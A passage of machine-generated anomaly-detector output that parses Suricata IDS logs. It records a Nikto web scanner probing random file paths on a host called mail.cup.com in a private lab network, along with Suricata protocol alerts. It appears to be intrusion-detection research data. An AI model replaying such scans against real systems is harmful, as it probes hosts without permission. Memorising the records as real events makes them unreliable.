(Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": 
",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.stm\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.stm\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.stm", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.stm", 
"/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46896, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2017848634013862,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2017848634013862, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.294206+0000\",\"flow_id\":2017848634013862,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46896,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", 
"PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.296158 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46898 -> 192.168.10.154:80", "/parser/model/time": 1583349514.296158, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46898, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.296158 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46898 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.properties", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.296395+0000\",\"flow_id\":2059741745021279,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.296395, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2059741745021279,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.properties\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.properties\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.properties", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 
"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.properties", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": 
"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46898, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2059741745021279,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2059741745021279, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.296395+0000\",\"flow_id\":2059741745021279,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46898,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.properties\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.properties\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], 
"Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.298422 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46900 -> 192.168.10.154:80", "/parser/model/time": 1583349514.298422, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46900, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.298422 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46900 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": 
"NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.html+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.298641+0000\",\"flow_id\":1615758090734080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.298641, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1615758090734080,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.html+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.html+\",", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.html+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.html+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", 
"/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46900, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1615758090734080,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1615758090734080, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.298641+0000\",\"flow_id\":1615758090734080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46900,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.html+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.html+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.300833 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46902 -> 192.168.10.154:80", "/parser/model/time": 1583349514.300833, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 
3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46902, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.300833 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46902 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.3 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.www_acl", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 